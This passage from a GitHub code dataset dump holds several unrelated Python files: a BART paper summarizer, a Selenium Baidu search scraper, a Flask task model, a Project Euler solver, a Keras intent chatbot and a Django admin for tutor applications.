noinspection PyBroadException\n try:\n main()\n except CardInBaseException as file_name:\n print(f'Карточка уже есть в {file_name}')\n except UnknownCommandException as command_line:\n print(f\"Неизвестная команда {command_line}\")\n except ExitException:\n print('Выход...')\n break\n except UnknownFieldNameException as field_name:\n print(f'Неизвестное поле {field_name}')\n except BadValueException as bad_value:\n print(f'Неверное значение {bad_value}')\n except TypeError as e:\n print(e)\n print('Неизвестная команда')\n except Exception:\n print(Exception.__class__.__name__)\n finally:\n print('----------------------------------------------\\n')\nnew_request()\n","repo_name":"vasil1y-777/Control-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9769878255","text":"import torch\nfrom transformers import BartTokenizer, BartForConditionalGeneration\nfrom fairseq.models.bart import BARTModel\n\ntorch_device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nBART_ARGS = {\n \"num_beams\": 4,\n \"length_penalty\": 2,\n \"max_length\": 142,\n \"min_length\": 56,\n \"no_repeat_ngram_size\": 3\n}\n\nSCITLDR_ARGS = {\n \"num_beams\": 2,\n \"length_penalty\": 0.4,\n \"max_length\": 30,\n \"min_length\": 5,\n \"no_repeat_ngram_size\": 3\n}\n\ndef summarize(paper_id, papers, model = \"BART\", content = \"content\"):\n \"\"\"\n Summarizes a single paper specified by its hash\n\n Params: \n paper_hash: hash to identify the paper\n papers: dict of papers containing the paper\n model: language model used (options: BART, SciTLDR)\n content: key specifying the field of the paper dict to be used (e.g. 
abstract, content...)\n \n Returns: \n summary string\n \"\"\"\n\n text = papers[paper_id][content]\n text = text.replace('\\n','')\n\n return summarize_batch([text], model)\n\ndef summarize_batch(texts, model = \"BART\"):\n \"\"\"\n Summarizes a provided batch of texts\n\n Params: \n texts: list containing texts to be summarized\n model: language model used (options: BART, SciTLDR)\n \n Returns: \n summarization as string\n \"\"\"\n\n if model == \"BART\":\n return bart_summarize(texts, **BART_ARGS)\n\n if model == \"SciTLDR\":\n return sciTLDR_summarize(texts, **SCITLDR_ARGS)\n\ndef bart_summarize(texts, num_beams, length_penalty, max_length, min_length, no_repeat_ngram_size):\n \"\"\"\n Summarizes a provied batch of texts using the BART model: \n https://arxiv.org/abs/1910.13461\n\n Params: \n texts: list containing texts to be summarized\n num_beams:\n length_penalty:\n max_length:\n min_length:\n no_repeat_ngram_size: \n \n Returns: \n list containing summary strings\n \"\"\"\n\n tokenizer = BartTokenizer.from_pretrained('facebook/bart-large-cnn')\n model = BartForConditionalGeneration.from_pretrained('facebook/bart-large-cnn')\n\n text_input_ids = tokenizer.batch_encode_plus(texts, return_tensors='pt', max_length=1024, truncation=True, padding=True)['input_ids'].to(torch_device)\n summary_ids = model.generate(text_input_ids, num_beams=num_beams, length_penalty=length_penalty, max_length=max_length, min_length=min_length, no_repeat_ngram_size=no_repeat_ngram_size) \n summary_txt = tokenizer.batch_decode(summary_ids, skip_special_tokens=True)\n return summary_txt\n\ndef sciTLDR_summarize(texts, num_beams, length_penalty, max_length, min_length, no_repeat_ngram_size):\n \"\"\"\n Summarizes a provied batch of texts using the SciTLDR model:\n https://arxiv.org/abs/2004.15011\n\n Params: \n texts: list containing texts to be summarized\n num_beams:\n length_penalty:\n max_length:\n min_length:\n no_repeat_ngram_size: \n \n Returns: \n list containing summary strings\n \"\"\"\n\n model_name_or_path = \"../data/models/SciTLDR/\"\n data_name_or_path = \"./SciTLDR-Data/SciTLDR-A/ctrl\"\n\n bart = BARTModel.from_pretrained(\n model_name_or_path = model_name_or_path,\n data_name_or_path = data_name_or_path + '-bin',\n ).to(torch_device)\n\n summary_txt = bart.sample(texts, beam=num_beams, lenpen=length_penalty, max_len_b=max_length, min_len=min_length, no_repeat_ngram_size=no_repeat_ngram_size)\n return summary_txt","repo_name":"Muelli21/RecommendingPapers","sub_path":"src/utils/summarizing.py","file_name":"summarizing.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11471997461","text":"# -*- coding: utf-8 -*-\n\nimport datetime3 as datetime # 用于获取当前日期作为默认日期\nimport time # 用于获取unix时间作为url中的参数,用于睡觉\nfrom lxml import etree\nfrom indentation import indent # 字符串缩进\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass baidusearcher():\n # 根本参数\n driver = None # webdriver.Chrome()\n\n # 搜索参数\n searchKeyword = None\n searchBaseUrl = 'https://www.baidu.com/s' +\\\n '?ie=utf-8' +\\\n '&tn=monline_4_dg' +\\\n '&ct=2097152' +\\\n '&rqlang=cn'\n searchEngine = 'baidu.com'\n searchSourceWebsite = None # 限定来源网站\n searchHowManyResultsOnePage = 10 # 设置每页显示多少结果\n searchStartTime = None # None表示没设置时间限制\n searchEndTime = None # None表示没设置时间限制\n resultWanted = None\n searchPageProcess = None\n resultPageProcess = None\n\n # 运行参数\n searchUrlInput = None # 
生成的searchUrl\n searchUrlOutput = None # 访问searchUrlInput并经过自动跳转后的真实searchUrl\n searchIndex = -1 # 一次搜索返回多个搜索页(search),这是搜索页索引,从0开始。\n searchHtml = None\n searchRoot = None\n searchTitle = None\n resultIndex = -1 # 一次搜索返回多条返回结果(result),这是结果的总(跨页)索引,从0开始。\n resultIndexInPage = None # 一个搜索页中有多条返回结果(result),这是结果的页内索引,从0开始。\n resultXPathPattern = lambda x: '//*[@id=\\\"' + str(x + 1) + '\\\"]' # 生成resultXPath的模板\n resultXPath = None # 从searchRoot到页内第x个resultElement的xpath\n resultElement = None # result块\n resultAXPath = 'h3/a' # 从resultElement到searchUrlInput的xpath\n resultUrlInput = None\n resultUrlOutput = None\n resultTitle = None\n resultText = None\n resultTime = None\n resultSaved = 0 # 不是每个结果都符合要求,这是已经处理了的符合要求的reasult的个数。\n\n @staticmethod\n def initDriver():\n # 创建options\n options = Options()\n # options添加启动参数\n options.add_argument('--headless') # 无头模式(不展示界面)\n options.add_argument('log-level=3') # INFO = 0 WARNING = 1 LOG_ERROR = 2 LOG_FATAL = 3 default is 0\n # options添加试验选项\n prefs = {\n \"profile.managed_default_content_settings.images\": 2, # 禁用图片\n 'profile.default_content_setting_values': {'notifications': 2} # 禁用弹窗\n }\n options.add_experimental_option(\"prefs\", prefs)\n # 创建driver\n baidusearcher.driver = webdriver.Chrome(\n options=options,\n executable_path='D:/ProgramFiles/chromedriver/chromedriver.exe'\n )\n\n @staticmethod\n def closeDriver():\n # baidusearcher.driver.close() # 关闭当前窗口,如果是当前打开的最后一个窗口,则退出浏览器(driver)\n baidusearcher.driver.quit() # 关闭所有相关的窗口,退出浏览器(driver)\n\n @staticmethod\n def initSearcher(\n keyword,\n startY=None, startM=None, startD=None, startH=None, startMi=None, startS=None,\n endY=None, endM=None, endD=None, endH=None, endMi=None, endS=None,\n howManyResultWanted=5,\n sourceWebsite=None,\n fiddler=None,\n searchPageProcess = None,\n resultPageProcess = None\n ):\n # 传参:要多少result\n baidusearcher.resultWanted = howManyResultWanted\n # 传参:关键字\n baidusearcher.searchKeyword = keyword\n # 传参:限制来源网页\n if sourceWebsite is not None:\n baidusearcher.searchSourceWebsite = sourceWebsite\n # 传参:限制开始时间\n now = datetime.datetime.now()\n ifStartTimeSeted = (startY or startM or startD or startH or startMi or startS) is not None\n ifEndTimeSeted = (endY or endM or endD or endH or endMi or endS) is not None\n if ifStartTimeSeted is True:\n startY = startY if startY is not None else now.year\n startM = startM if startY is not None else now.month\n startD = startD if startY is not None else now.day\n 'startH = startH if startY is not None else today.day'\n 'startMi = startMi if startY is not None else today.day'\n 'startS = startS if startY is not None else today.day'\n baidusearcher.searchStartTime = datetime.datetime(startY, startM, startD, 0, 0, 0)\n # 传参:限制结束时间\n if ifEndTimeSeted is True:\n endY = endY if endY is not None else now.year\n endM = endM if endY is not None else now.month\n endD = endD if endY is not None else now.day\n 'endH = endH if endY is not None else today.day'\n 'endMi = endMi if endY is not None else today.day'\n 'endS = endS if endY is not None else today.day'\n baidusearcher.searchEndTime = datetime.datetime(endY, endM, endD, 23, 59, 59)\n else:\n if ifStartTimeSeted is True:\n # 当开始时间设置了,即使结束时间没设置,也要默认设为当前时间\n baidusearcher.searchEndTime = now\n else:\n pass\n # 传参:搜索网址\n baidusearcher.searchUrlInput = baidusearcher.searchBaseUrl\n '''添加关键词'''\n baidusearcher.searchUrlInput += ('&wd=' + baidusearcher.searchKeyword)\n '''添加来源网站'''\n if baidusearcher.searchSourceWebsite is not None:\n baidusearcher.searchUrlInput += ('&si=' + 
baidusearcher.searchSourceWebsite)\n '''添加开始时间'''\n if baidusearcher.searchStartTime is not None:\n startTimeUnix = time.mktime(baidusearcher.searchStartTime.timetuple())\n startTimeUnix = str(int(startTimeUnix))\n baidusearcher.searchUrlInput += ('&gpc=stf=' + startTimeUnix)\n elif baidusearcher.searchEndTime is not None:\n baidusearcher.searchUrlInput += ('gpc=stf=' + '0')\n '''添加结束时间'''\n if baidusearcher.searchEndTime is not None:\n endTimeUnix = time.mktime(baidusearcher.searchEndTime.timetuple())\n endTimeUnix = str(int(endTimeUnix))\n baidusearcher.searchUrlInput += (',' + endTimeUnix)\n baidusearcher.searchUrlInput += '%7Cstftype%3D2&tfflag=1'\n '''添加每页结果数'''\n baidusearcher.searchUrlInput += ('&rn=' + str(baidusearcher.searchHowManyResultsOnePage))\n # 传参:处理函数\n baidusearcher.searchPageProcess = searchPageProcess\n baidusearcher.resultPageProcess = resultPageProcess\n\n @staticmethod\n def search():\n # 类变量���字太长,固定不变的类变量起个简短的别名\n rn = baidusearcher.searchHowManyResultsOnePage\n # 运行参数归零\n baidusearcher.searchIndex = -1\n baidusearcher.resultIndex = -1\n baidusearcher.resultIndexInPage = None\n baidusearcher.resultSaved = 0\n # 遍历每个返回结果\n while baidusearcher.resultSaved <= baidusearcher.resultWanted:\n # 遍历下一个result\n baidusearcher.resultIndex += 1\n # 确认页数\n ifNextPage = baidusearcher.searchIndex != (baidusearcher.resultIndex // rn)\n baidusearcher.searchIndex = baidusearcher.resultIndex // rn\n baidusearcher.resultIndexInPage = baidusearcher.resultIndex % rn\n # 是否翻页\n if ifNextPage:\n baidusearcher.searchUrlInput += ('&pn=' + str(baidusearcher.searchIndex*rn))\n print(\n indent(\n '第'+str(baidusearcher.searchIndex)+'页'+baidusearcher.searchUrlInput,\n length=100, fIndent=2, lIndent=2\n )\n )\n # 访问\n baidusearcher.driver.get(baidusearcher.searchUrlInput)\n # 获取信息\n baidusearcher.searchHtml = baidusearcher.driver.page_source\n baidusearcher.searchTitle = baidusearcher.driver.title\n baidusearcher.searchUrlOutput = baidusearcher.driver.current_url\n baidusearcher.searchRoot = etree.HTML(baidusearcher.searchHtml)\n # 处理搜索页\n baidusearcher.searchPageProcess()\n # 定位result\n baidusearcher.resultXPath = baidusearcher.resultXPathPattern(baidusearcher.resultIndexInPage)\n baidusearcher.resultElement = baidusearcher.searchRoot.xpath('.'+baidusearcher.resultXPath)\n # 如果result定位失败,则跳过此次循环\n if baidusearcher.resultElement == []:\n print(' 没有更多的结果了')\n return 0\n else:\n baidusearcher.resultElement = baidusearcher.resultElement[0]\n # 定位resultUrl\n baidusearcher.resultUrlInput = baidusearcher.resultElement.xpath('./'+baidusearcher.resultAXPath+'/@href')\n # 如果结果url定位失败则跳过此次循环\n if baidusearcher.resultUrlInput == []:\n print(\n indent(\n '第%d(%dp%d)个结果,因如下原因落选:%s' % (\n baidusearcher.resultIndex,\n baidusearcher.searchIndex,\n baidusearcher.resultIndexInPage,\n '未找到网址'\n ),\n length=100, fIndent=4, lIndent=4\n )\n )\n continue\n else:\n baidusearcher.resultUrlInput = baidusearcher.resultUrlInput[0]\n # 处理resultPage\n resultProcessReturn = baidusearcher.resultPageProcess()\n # 判断结果是否合格\n if resultProcessReturn[0]:\n baidusearcher.resultSaved += 1\n print(\n indent(\n '第%d(%dp%d)个结果入选为第%d个正确结果: ' % (\n baidusearcher.resultIndex,\n baidusearcher.searchIndex,\n baidusearcher.resultIndexInPage,\n baidusearcher.resultSaved\n ),\n length=100, fIndent=4, lIndent=4\n )\n )\n else:\n print(\n indent(\n '第%d(%dp%d)个结果,因如下原因落选:%s' % (\n baidusearcher.resultIndex,\n baidusearcher.searchIndex,\n baidusearcher.resultIndexInPage,\n resultProcessReturn[1]\n ),\n length=100, fIndent=4, lIndent=4\n )\n 
)\n","repo_name":"Zhuo-Ren/baiduXinhuaNewsSpider","sub_path":"baidusearcher.py","file_name":"baidusearcher.py","file_ext":"py","file_size_in_byte":11110,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"41023180574","text":"from flask import current_app\nfrom app import db\nfrom app.models.goal import Goal\n\n\nclass Task(db.Model):\n task_id = db.Column(db.Integer, primary_key=True, autoincrement = True, nullable=False)\n title = db.Column(db.String(64), nullable=False)\n description = db.Column(db.String(64), nullable=False)\n completed_at = db.Column(db.DateTime, nullable=True)\n goal_id = db.Column(db.Integer, db.ForeignKey('goal.goal_id'), nullable=True)\n\n\n def to_dict(self):\n\n if self.goal_id == None:\n task_dict = {\n\n \"id\": self.task_id,\n \"title\": self.title,\n \"description\": self.description,\n \"is_complete\": self.completed_at is not None,\n\n }\n\n else:\n task_dict = {\n \n \"id\": self.task_id,\n \"goal_id\": self.goal_id,\n \"title\": self.title,\n \"description\": self.description,\n \"is_complete\": self.completed_at is not None,\n\n\n }\n\n return task_dict\n ","repo_name":"heysierra/task-list-api","sub_path":"app/models/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"2869867042","text":"from mylib import sqrt\n\n\ndef sigma2(n):\n sieveLimit = sqrt(n)\n spf = [2 if i % 2 == 0 else i for i in range(n + 1)]\n for i in range(3, sieveLimit + 1, 2):\n if spf[i] == i:\n for m in range(i * i, n + 1, 2 * i):\n if spf[m] == m:\n spf[m] = i\n\n res = 1\n sigma = [0] * (n + 1)\n sigma[1] = 1\n for i in range(2, n + 1):\n p = spf[i]\n q = 1\n factor = 1\n m = i\n while m % p == 0:\n m //= p\n q *= p**2\n factor += q\n sigma[i] = factor * sigma[m]\n if sqrt(sigma[i])**2 == sigma[i]:\n res += i\n\n return res\n\n\nprint(sigma2(64000000))\n","repo_name":"smsxgz/euler_project","sub_path":"problems/problem_211/Divisor_Square_Sum.py","file_name":"Divisor_Square_Sum.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22063624884","text":"from flask import Flask, render_template, request\nimport json\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Embedding, LSTM, Flatten, Dense\nimport numpy as np\nimport pandas as pd\nimport string\nimport random\n\napp = Flask(__name__)\n\n# Variabel global\nwords, classes, tokenizer = [], [], None\n\ndef preprocess_data():\n global words, classes, tokenizer\n # Importing the dataset\n with open('kampus_merdeka.json') as content:\n data1 = json.load(content)\n\n tags = [] # data tag\n inputs = [] # data input atau pattern\n responses = {} # data respon\n ignore_words = ['?', '!'] # Mengabaikan tanda spesial karakter\n\n # Tambahkan data intents dalam json\n for intent in data1['intents']:\n responses[intent['tag']] = intent['responses']\n for lines in intent['patterns']:\n inputs.append(lines)\n tags.append(intent['tag'])\n # digunakan untuk pattern atau teks pertanyaan dalam json\n for pattern in intent['patterns']:\n w = nltk.word_tokenize(pattern)\n words.extend(w)\n # tambahkan ke dalam list 
kelas dalam data\n if intent['tag'] not in classes:\n classes.append(intent['tag'])\n\n # Konversi data json ke dalam dataframe\n data = pd.DataFrame({\"patterns\": inputs, \"tags\": tags})\n\n # Removing Punctuations (Menghilangkan Punktuasi)\n data['patterns'] = data['patterns'].apply(lambda wrd: [ltrs.lower() for ltrs in wrd if ltrs not in string.punctuation])\n data['patterns'] = data['patterns'].apply(lambda wrd: ''.join(wrd))\n\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(w.lower()) for w in words if w not in ignore_words]\n words = sorted(list(set(words)))\n\n # sorting pada data class\n classes = sorted(list(set(classes)))\n\n # Tokenize the data (Tokenisasi Data)\n tokenizer = Tokenizer(num_words=2000)\n tokenizer.fit_on_texts(data['patterns'])\n train = tokenizer.texts_to_sequences(data['patterns'])\n\n # Melakukan proses padding pada data\n x_train = pad_sequences(train)\n\n # Melakukan konversi data label tags dengan encoding\n le = LabelEncoder()\n y_train = le.fit_transform(data['tags'])\n\n # Melihat hasil input pada data teks\n input_shape = x_train.shape[1]\n\n return x_train, y_train, input_shape, le, responses\n\ndef create_model(input_shape, vocabulary, output_length):\n # Creating the model (Membuat Modelling)\n i = Input(shape=(input_shape,)) # Layer Input\n x = Embedding(vocabulary + 1, 10)(i) # Layer Embedding\n x = LSTM(10, return_sequences=True, recurrent_dropout=0.2)(x) # Layer Long Short Term Memory\n x = Flatten()(x) # Layer Flatten\n x = Dense(output_length, activation=\"softmax\")(x) # Layer Dense\n model = Model(i, x) # Model yang telah disusun dari layer Input sampai layer Output\n\n # Compiling the model (Kompilasi Model)\n model.compile(loss=\"sparse_categorical_crossentropy\", optimizer='adam', metrics=['accuracy'])\n\n return model\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n global words, classes, tokenizer\n if request.method == 'POST':\n prediction_input = request.form['user_input']\n\n x_train, y_train, input_shape, le, responses = preprocess_data()\n model = create_model(input_shape, len(words), len(classes))\n \n output = model.predict(pad_sequences(tokenizer.texts_to_sequences([prediction_input]), maxlen=input_shape))\n output = output.argmax()\n\n response_tag = le.inverse_transform([output])[0]\n bot_response = random.choice(responses[response_tag])\n\n return render_template('index.html', user_input=prediction_input, bot_response=bot_response)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"SriYanisaa/chatbot-kampus-merdeka-deep-learning","sub_path":"arsip_app.py","file_name":"arsip_app.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7062993223","text":"from compat import reverse\nfrom django.contrib import admin\nfrom django.http import HttpRequest\nfrom simplejson import OrderedDict\nfrom tutor_management.models import (\n NewTutorApplicant,\n Reference,\n TutorApplicantTrack,\n TutorRevamp,\n VerifiedTutor,\n TutorSkill,\n Skill,\n QuizSitting,\n VerifiedTutorWithSkill,\n)\nfrom .forms import GuarantorForm\nfrom django.db import models\nfrom django.utils import timesince\nfrom django.utils.html import escapejs\nfrom django.contrib.admin.helpers import ActionForm\nfrom django import forms\nfrom config.utils import streaming_response\nfrom django.contrib import messages\nfrom users.models import UserProfile, 
Location\nfrom registration.admin import (\n VerifiedTutorAdmin as RVerifiedTutorAdmin,\n VerifiedTutorSkillsAdmin as RVerifiedTutorSkillsAdmin,\n TutorRevampAdmin as RTutorRevampAdmin,\n)\nfrom skills.admin import (\n TutorSkillAdmin as RTutorSkillAdmin,\n QuizSittingAdmin as RQuizSittingAdmin,\n SkillAdmin as RSkillAdmin,\n)\n\n# Register your models here.\n\nimport json\n\n\nclass WithRemark(admin.SimpleListFilter):\n title = \"With remark\"\n parameter_name = \"with_remark\"\n\n def lookups(self, request, model_admin):\n return ((\"with_remark\", \"with_remark\"),)\n\n def queryset(self, request, queryset):\n if self.value():\n new_queryset = queryset.filter(\n data_dump__tutor_update__admin_remarks__0__isnull=False\n )\n return new_queryset\n return queryset\n\n\nclass StateFilter(admin.SimpleListFilter):\n title = \"State\"\n parameter_name = \"state\"\n\n def lookups(self, request, model_admin):\n return Location.NIGERIAN_STATES\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(\n data_dump__tutor_update__personalInfo__state__icontains=self.value()\n )\n return queryset\n\n\nclass CurrentStepFilter(admin.SimpleListFilter):\n title = \"Current Step\"\n parameter_name = \"current_step\"\n APPLY = \"apply\"\n VERIFY = \"verify\"\n SUBJECTS = \"subjects\"\n COMPLETE = \"complete\"\n PREFERENCES = \"preferences\"\n TERMS = \"terms\"\n VERIFIED_TUTOR = \"application-verified\"\n\n def lookups(self, request, model_admin):\n return (\n (self.APPLY, f\"{self.APPLY} (Step 1)\"),\n (self.SUBJECTS, f\"{self.SUBJECTS} (Step 2)\"),\n (self.VERIFY, f\"{self.VERIFY} (Step 3)\"),\n (self.COMPLETE, f\"{self.COMPLETE} (Step 4)\"),\n (self.PREFERENCES, f\"{self.PREFERENCES} (Step 5)\"),\n (self.TERMS, f\"{self.TERMS} (Step 6)\"),\n (self.VERIFIED_TUTOR, f\"{self.VERIFIED_TUTOR} (Step 7)\"),\n )\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.by_current_step(self.value())\n return queryset\n\n\nclass GuarantorsApprovedFilter(admin.SimpleListFilter):\n title = \"Guarantors\"\n parameter_name = \"guarantors\"\n\n def lookups(self, request, model_admin):\n return (\n (\"approved\", \"Approved\"),\n (\"pending\", \"Pending\"),\n (\"missing\", \"Missing Gurantors\"),\n )\n\n def queryset(self, reuqest, queryset):\n if self.value() == \"approved\":\n return queryset.filter(data_dump__tutor_update__guarantors_verified=True)\n if self.value() == \"pending\":\n condition_1 = models.Q(\n data_dump__tutor_update__guarantors_verified__isnull=True\n )\n condition_2 = models.Q(\n data_dump__tutor_update__educationWorkHistory__guarantors__0__isnull=False\n )\n return queryset.filter(condition_1 & condition_2)\n if self.value() == \"missing\":\n condition_1 = models.Q(\n data_dump__tutor_update__educationWorkHistory__guarantors__0__isnull=True\n )\n condition_2 = mdoels.Q(\n data_dump__tutor_update__educationWorkHistory__guarantors__isnull=True\n )\n return queryset.filter(condition_1 | condition_2)\n return queryset\n\n\nclass VideoSummaryApprovedFilter(admin.SimpleListFilter):\n title = \"Video Submission\"\n parameter_name = \"video\"\n\n def lookups(self, request, model_admin):\n return (\n (\"approved\", \"Approved\"),\n (\"pending\", \"Pending\"),\n (\"missing\", \"Missing Video\"),\n )\n\n def queryset(self, request, queryset):\n if self.value() == \"approved\":\n return queryset.filter(data_dump__tutor_update__others__videoVerified=True)\n if self.value() == \"pending\":\n condition_1 = 
models.Q(data_dump__tutor_update__others__videoVerified=False)\n condition_2 = models.Q(\n data_dump__tutor_update__others__videoVerified__isnull=True\n )\n return queryset.filter(\n data_dump__tutor_update__others__videoSummary__url__startswith=\"http\"\n ).filter(condition_2 | condition_1)\n\n if self.value() == \"missing\":\n condition_1 = models.Q(\n data_dump__tutor_update__others__videoSummary__isnull=True\n )\n condition_2 = models.Q(\n data_dump__tutor_update__others__videoSummary__url=\"\"\n )\n return queryset.filter(condition_1 | condition_2)\n return queryset\n\n\nclass IdentityApprovedFilter(admin.SimpleListFilter):\n title = \"Identity\"\n parameter_name = \"identity\"\n\n def lookups(self, request, model_admin):\n return (\n (\"approved\", \"Approved\"),\n (\"pending\", \"Pending\"),\n (\"missing\", \"Missing identity\"),\n )\n\n def queryset(self, request, queryset):\n if self.value() == \"approved\":\n return queryset.filter(data_dump__tutor_update__identity__isIdVerified=True)\n if self.value() == \"pending\":\n return queryset.filter(\n data_dump__tutor_update__identity__uploadStore__files__0__isnull=False\n ).exclude(data_dump__tutor_update__identity__isIdVerified=True)\n if self.value() == \"missing\":\n condition_1 = models.Q(\n data_dump__tutor_update__identity__uploadStore__files__0__isnull=True\n )\n condition_2 = models.Q(\n data_dump__tutor_update__identity__uploadStore__isnull=True\n )\n return queryset.filter(condition_1 | condition_2)\n return queryset\n\n\nclass GenderFilter(admin.SimpleListFilter):\n title = \"Gender\"\n parameter_name = \"gender\"\n\n def lookups(self, request, model_admin):\n return [(x, x) for x in [\"male\", \"female\"]]\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(\n data_dump__tutor_update__personalInfo__gender=self.value()\n )\n return queryset\n\n\nclass ApplicationStatusFilter(admin.SimpleListFilter):\n title = \"Application status\"\n parameter_name = \"application_status\"\n\n def lookups(self, request, model_admin):\n return [\n (x, x)\n for x in [\n \"verified\",\n \"verified_complete\",\n \"verified_not_complete\",\n \"denied\",\n \"frozen\",\n \"not_approved\",\n ]\n ]\n\n def queryset(self, request, queryset):\n if self.value() == \"verified\":\n return queryset.filter(\n profile__application_status=UserProfile.VERIFIED,\n data_dump__tutor_update__appData__currentStep=\"application-verified\",\n )\n if self.value() == \"verified_complete\":\n return queryset.filter(\n profile__application_status=UserProfile.VERIFIED,\n data_dump__tutor_update__appData__currentStep=\"complete\",\n )\n if self.value() == \"verified_not_complete\":\n return queryset.filter(\n profile__application_status=UserProfile.VERIFIED,\n data_dump__tutor_update__others__approved=True,\n data_dump__tutor_update__others__submission=True,\n ).exclude(\n data_dump__tutor_update__appData__currentStep=\"application-verified\"\n )\n if self.value() == \"denied\":\n return queryset.filter(\n profile__application_status=UserProfile.DENIED,\n data_dump__tutor_update__appData__currentStep=\"complete\",\n )\n if self.value() == \"frozen\":\n return queryset.filter(\n profile__application_status=UserProfile.FROZEN,\n data_dump__tutor_update__appData__currentStep=\"complete\",\n )\n if self.value() == \"not_approved\":\n return queryset.exclude(\n profile__application_status__in=[\n UserProfile.DENIED,\n UserProfile.VERIFIED,\n ]\n )\n return queryset\n\n\nclass UpdateStepForm(ActionForm):\n application_step = 
forms.ChoiceField(\n choices=[(\"\", \"Select\")]\n + [\n (x, x)\n for x in [\n \"personal-info\",\n \"location-info\",\n \"education-history\",\n \"work-history\",\n \"schedule-info\",\n \"teaching-profile\",\n \"payment-info\",\n \"new-development-info\",\n \"agreement-info\",\n \"verification-info\",\n \"guarantors-info\",\n \"verify-email\",\n \"video-summary\",\n \"subject-selection\",\n ]\n ],\n required=False,\n )\n current_step = forms.ChoiceField(\n choices=[(\"\", \"Select\")]\n + [\n (x, x)\n for x in [\n \"apply\",\n \"verify\",\n \"subjects\",\n \"complete\",\n \"preferences\",\n \"terms\",\n \"application-verified\",\n ]\n ],\n required=False,\n )\n\n\n@admin.register(TutorApplicantTrack)\nclass TutorApplicantTrackAdmin(admin.ModelAdmin):\n date_hierarchy = \"profile__date_approved\"\n main_fields = [\n \"the_email\",\n \"full_name\",\n \"dob\",\n \"gender\",\n \"phone\",\n \"location_country\",\n \"educations\",\n \"work_experiences\",\n \"profile_pic\",\n \"user_identity_info\",\n \"video_intro\",\n \"skills\",\n \"date_applied\",\n \"address\",\n \"references\",\n \"tutor_remarks\",\n \"current_step\",\n \"completed_steps\",\n ]\n search_fields = [\"email\"]\n list_display = main_fields + [\n \"delivery_method\",\n \"payment_info\",\n \"availability\",\n \"last_logged_in\",\n \"hijack_user\",\n ]\n list_filter = [\n CurrentStepFilter,\n GenderFilter,\n VideoSummaryApprovedFilter,\n IdentityApprovedFilter,\n ApplicationStatusFilter,\n WithRemark,\n ]\n change_list_template = \"admin/tutor_management/change_list2.html\"\n action_form = UpdateStepForm\n actions = [\n \"update_application_step\",\n \"update_application_step_without_email\",\n \"revert_approval_status\",\n \"re_approve_tutors\",\n \"export_as_csv\",\n \"freeze_tutor_profile\",\n \"update_approved_tutors_status\",\n \"update_not_approved_tutors_status\",\n \"update_current_step_for_existing_tutors\",\n \"sync_to_mailing_list\",\n \"update_profile_picture\"\n ]\n\n def update_profile_picture(self, request,queryset):\n for tutor in queryset.all():\n tutor.update_profile_picture()\n self.message_user(request, \"profile picture updated\")\n\n def get_actions(self, request: HttpRequest) -> OrderedDict:\n actions = super().get_actions(request)\n query_params = request.GET.get(\"application_status\")\n if query_params != \"verified_complete\":\n actions.pop(\"update_approved_tutors_status\")\n if query_params != \"not_approved\":\n actions.pop(\"update_not_approved_tutors_status\")\n if query_params != \"verified_not_complete\":\n actions.pop(\"update_current_step_for_existing_tutors\")\n return actions\n\n class Media:\n css = {\n \"screen\": (\n \"https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\",\n \"admin/dist/bootstrap.min.css\",\n \"admin/dist/admin-modal-bootstrap-mod.css\",\n )\n }\n js = (\"admin/dist/bootstrap.min.js\",)\n\n def hijack_user(self, obj: TutorApplicantTrack):\n url = (\n '<a href=\"/hijack/%s\" target=\"_blank\">Hijack user</a>' % obj.pk\n + '<p><a href=\"%s\" target=\"_blank\">View tutor profile</a></p>'\n % obj.get_application_link\n )\n if obj.profile.application_status == UserProfile.VERIFIED:\n url += (\n '<p><a href=\"%s?redirect_url=/dashboard/\" target=\"_blank\">Main site</a></p>'\n % reverse(\"users:auth_existing_tutor\", args=[obj.pk, obj.slug])\n )\n return url\n\n hijack_user.allow_tags = True\n\n def last_logged_in(self, obj):\n if obj.last_visit:\n return timesince.timesince(obj.last_visit)\n\n last_logged_in.short_description = \"last logged 
